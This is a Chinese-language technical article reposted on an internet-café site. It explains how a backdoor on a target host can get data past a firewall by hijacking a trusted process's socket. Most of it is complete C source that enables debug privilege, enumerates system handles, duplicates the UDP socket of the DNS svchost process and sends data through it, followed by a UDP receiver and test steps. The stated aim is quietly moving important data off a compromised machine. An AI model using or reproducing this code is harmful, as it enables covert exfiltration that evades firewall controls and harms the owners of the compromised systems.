天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

如何穿透防火墙的验证拦截进行数据传输

2008-2-18赛迪网佚名

  背景:

  在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大。其他情况“严重”不推荐使用该技术(后面我会讲到为什么)。

  针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦。相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦。所以,我的思路很简单:将其他进程中允许数据传输的套接字句柄拿为已用。

  过程如下:

  1. 找出目标进程

  2. 找出SOCKET句柄

  2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用

  3. 用转换后的SOCKET进行数据传输
上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论),而且从上面的实现方法也可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP。针对不同系统不同进程我们很难定位一个稳定的进程SOCKET。

  看到上面这些,你有点丧气了对不对,哈哈。 再想一想,其实我们有一条真正的通罗马的“黄金大道”。

  我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS。你能想像域名解析数据都被拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀。

  下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子。编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等。具体解决方法请细看注释部分。

  /*++

  

  Made By ZwelL

  zwell@sohu.com

  2005.4.12

  --*/

  #include

  #include

  #include

  

  #pragma comment(lib, "ws2_32")

  #pragma comment(lib, "wtsapi32")

  

  #define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)

  #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

  

  typedef LONG NTSTATUS;

  typedef struct _SYSTEM_HANDLE_INFORMATION

  {

   ULONG ProcessId;

   UCHAR ObjectTypeNumber;

   UCHAR Flags;

   USHORT Handle;

   PVOID Object;

   ACCESS_MASK GrantedAccess;

  } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

  

  typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

  

  ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

  

  BOOL LocateNtdllEntry ( void )

  {

   BOOL ret = FALSE;

   char NTDLL_DLL[] = "ntdll.dll";

   HMODULE ntdll_dll = NULL;

   if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )

   {

   printf( "GetModuleHandle() failed");

   return( FALSE );

   }

   if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress

  ( ntdll_dll, "ZwQuerySystemInformation" ) ) )

   {

   goto LocateNtdllEntry_exit;

   }

   ret = TRUE;

  

  LocateNtdllEntry_exit:

  

   if ( FALSE == ret )

   {

   printf( "GetProcAddress() failed");

   }

   ntdll_dll = NULL;

   return( ret );

  }

  /*++

  This routine is used to get a process's username from it's SID

  --*/

  BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)

  {

   // sanity checks and default value

   if (pUserSid == NULL)

   return false;

   strcpy(szUserName, "?");

  

   SID_NAME_USE snu;

   TCHAR szUser[_MAX_PATH];

   DWORD chUser = _MAX_PATH;

   PDWORD pcchUser = &chUser;

   TCHAR szDomain[_MAX_PATH];

   DWORD chDomain = _MAX_PATH;

   PDWORD pcchDomain = &chDomain;

   // Retrieve user name and domain name based on user's SID.

   if (

   ::LookupAccountSid(

   NULL,

   pUserSid,

   szUser,

   pcchUser,

   szDomain,

   pcchDomain,

   &snu

   )

   )

   {

   wsprintf(szUserName, "%s", szUser);

   }

   else

   {

   return false;

   }

  

   return true;

  }

  

  

  /*++

  

  This routine is used to get the DNS process's Id

  

  Here, I use WTSEnumerateProcesses to get process user Sid,

  and then get the process user name. Beacause as it's a "NETWORK SERVICE",

  we cann't use OpenProcessToken to catch the DNS process's token information,

  even if we has the privilege in catching the SYSTEM's.

  

  --*/

  DWORD GetDNSProcessId()

  {

   PWTS_PROCESS_INFO pProcessInfo = NULL;

   DWORD ProcessCount = 0;

   char szUserName[255];

   DWORD Id = -1;

  

   if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))

   {

   // dump each process description

   for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)

   {

  

   if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )

   {

   GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);

   if( strcmp(szUserName, "NETWORK SERVICE") == 0)

   {

   Id = pProcessInfo[CurrentProcess].ProcessId;

   break;

   }

   }

   }

  

   WTSFreeMemory(pProcessInfo);

   }

  

   return Id;

  }

  

  

  /*++

  This doesn't work as we know, sign...

  but you can use the routine for other useing...

  --*/

  /*

  BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)

  {

   HANDLE hProcess = NULL,

   hAccessToken = NULL;

   TCHAR InfoBuffer[1000], szDomainName[200];

   PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;

   DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;

   SID_NAME_USE snu;

  

   hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);

   if(hProcess == NULL)

   {

   printf("OpenProcess wrong");

   CloseHandle(hProcess);

   return false;

   }

  

   if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))

   {

   printf("OpenProcessToken wrong:%08x", GetLastError());

   return false;

   }

  

   GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,

   1000, &dwInfoBufferSize);

  

   LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,

   &dwAccountSize,szDomainName, &dwDomainSize, &snu);

  

   if(hProcess)

   CloseHandle(hProcess);

   if(hAccessToken)

   CloseHandle(hAccessToken);

   return true;

  }*/

  

  

  /*++

  Now, it is the most important stuff... ^_^

  --*/

  SOCKET GetSocketFromId (DWORD PID)

  {

   NTSTATUS status;

   PVOID buf = NULL;

   ULONG size = 1;

   ULONG NumOfHandle = 0;

   ULONG i;

   PSYSTEM_HANDLE_INFORMATION h_info = NULL;

   HANDLE sock = NULL;

   DWORD n;

  

   buf=malloc(0x1000);

   if(buf == NULL)

   {

   printf("malloc wrong\n");

   return NULL;

   }

   status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );

   if(STATUS_INFO_LENGTH_MISMATCH == status)

   {

   free(buf);

   buf=malloc(n);

   if(buf == NULL)

   {

   printf("malloc wrong\n");

   return NULL;

   }

   status = ZwQuerySystemInformation( 0x10, buf, n, NULL);

   }

   else

   {

   printf("ZwQuerySystemInformation wrong\n");

   return NULL;

   }

  

   NumOfHandle = *(ULONG*)buf;

  

   h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

  

   for(i = 0; i

   {

   try

   {

   if( ( h_info.ProcessId == PID ) && ( h_info.ObjectTypeNumber == 0x1c )

   && (h_info.Handle!=0x2c) // I don't know why if the Handle equal to 0x2c,

  in my test, it stops at getsockname()

   // So I jump over this situation...

   // May be it's different in your system,

   ) //wind2000 is 0x1a

   {

   //printf("Handle:0x%x Type:%08x\n",h_info.Handle, h_info.ObjectTypeNumber);

   if( 0 == DuplicateHandle(

   OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),

   (HANDLE)h_info.Handle,

   GetCurrentProcess(),

   &sock,

   STANDARD_RIGHTS_REQUIRED,

   true,

   DUPLICATE_SAME_ACCESS)

   )

   {

   printf("DuplicateHandle wrong:%8x", GetLastError());

   continue;

   }

  

   //printf("DuplicateHandle ok\n");

   sockaddr_in name = {0};

   name.sin_family = AF_INET;

   int namelen = sizeof(sockaddr_in);

   getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );

   //printf("PORT=%5d\n", ntohs( name.sin_port ));

   if(ntohs(name.sin_port)>0) // if port > 0, then we can use it

   break;

   }

   }

   catch(...)

   {

   continue;

   }

   }

  

   if ( buf != NULL )

   {

   free( buf );

   }

   return (SOCKET)sock;

  }

  

  

  /*++

  This is not required...

  --*/

  BOOL EnablePrivilege (PCSTR name)

  {

   HANDLE hToken;

   BOOL rv;

  

   TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };

   LookupPrivilegeValue (

   0,

   name,

   &priv.Privileges[0].Luid

   );

  

   priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

  

   OpenProcessToken(

   GetCurrentProcess (),

   TOKEN_ADJUST_PRIVILEGES,

   &hToken

   );

  

   AdjustTokenPrivileges (

   hToken,

   FALSE,

   &priv,

   sizeof priv,

   0,

   0

   );

  

   rv = GetLastError () == ERROR_SUCCESS;

  

   CloseHandle (hToken);

   return rv;

  }

  

  void main()

  {

   WSADATA wsaData;

   char testbuf[255];

   SOCKET sock;

   sockaddr_in RecvAddr;

  

   int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

   if (iResult != NO_ERROR)

   printf("Error at WSAStartup()\n");

  

   if(!LocateNtdllEntry())

   return;

  

   if(!EnablePr
ivilege (SE_DEBUG_NAME)) { printf("EnablePrivilege wrong\n"); return; } sock = GetSocketFromId(GetDNSProcessId()); if( sock==NULL) { printf("GetSocketFromId wrong\n"); return; } //Change there value... RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(SOCKET_ERROR == sendto(sock, "test", 5, 0, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr))) { printf("sendto wrong:%d\n", WSAGetLastError()); } else { printf("send ok... Have fun, right? ^_^\n"); } getchar(); //WSACleanup(); return; } [Copy to clipboard]

  很早以前我就有这个想法了,只是一直没有去实现。在上面的代码中,因为要找出DNS进程句柄,而svchost.exe又有多个,所以以用户名来进行判断,本来是用OpenProcessToken,但是怎么也不行。所以换个方法,用到了wtsapi32库函数。

  再用下面的代码测试:

  CODE:

  /*++

  UdpReceiver

  --*/

  #include

  #include "winsock2.h"

  

  #pragma comment(lib, "ws2_32")

  

  void main()

  {

  WSADATA wsaData;

  SOCKET RecvSocket;

  sockaddr_in RecvAddr;

  int Port = 5555;

  char RecvBuf[1024];

  int BufLen = 1024;

  sockaddr_in SenderAddr;

  int SenderAddrSize = sizeof(SenderAddr);

  

  //-----------------------------------------------

  // Initialize Winsock

  WSAStartup(MAKEWORD(2,2), &wsaData);

  

  //-----------------------------------------------

  // Create a receiver socket to receive datagrams

  RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

  

  //-----------------------------------------------

  // Bind the socket to any address and the specified port.

  RecvAddr.sin_family = AF_INET;

  RecvAddr.sin_port = htons(Port);

  RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

  

  bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

  

  //-----------------------------------------------

  // Call the recvfrom function to receive datagrams

  // on the bound socket.

  printf("Receiving datagrams...\n");

  while(1)

  {

   recvfrom(RecvSocket,

   RecvBuf,

   BufLen,

   0,

   (SOCKADDR *)&SenderAddr,

   &SenderAddrSize);

   printf("%s\n", RecvBuf);

  }

  

  //-----------------------------------------------

  // Close the socket when finished receiving datagrams

  printf("Finished receiving. Closing socket.\n");

  closesocket(RecvSocket);

  

  //-----------------------------------------------

  // Clean up and exit.

  printf("Exiting.\n");

  WSACleanup();

  return;

  }

  [Copy to clipboard]
测试步骤:

  1. 在一台机器上执行UdpReceiver。

  2. 在安装防火墙的机器上执行第一个程序。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:赛迪网 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行